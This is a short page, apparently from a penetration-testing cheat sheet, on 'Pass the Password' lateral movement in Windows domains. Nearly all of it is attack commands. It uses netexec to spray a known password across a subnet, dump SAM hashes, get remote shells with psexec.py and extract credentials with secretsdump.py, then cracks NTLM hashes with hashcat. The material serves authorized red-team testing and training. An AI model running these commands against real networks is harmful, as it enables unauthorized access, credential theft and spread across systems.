Pass the Password

nxc $network_ip/$cidr -d $domain -u $user -p $password

Once you get the pwn3d machines you can psexec or so, or you can even use some modules and options provided by netexec.

# dumping sam file
nxc $network_ip/$cidr -d $domain -u $user -p $password --sam

psexec.py $domain/$username:$password@$machine_ip

# dump hashes
secretsdump.py $domain/$username:$password@$machine_ip

# crack hashes
hashcat -m 1000 hashfile dict_file -O

PreviousPass the Hash NextRubeus

Last updated 1 year ago

Was this helpful?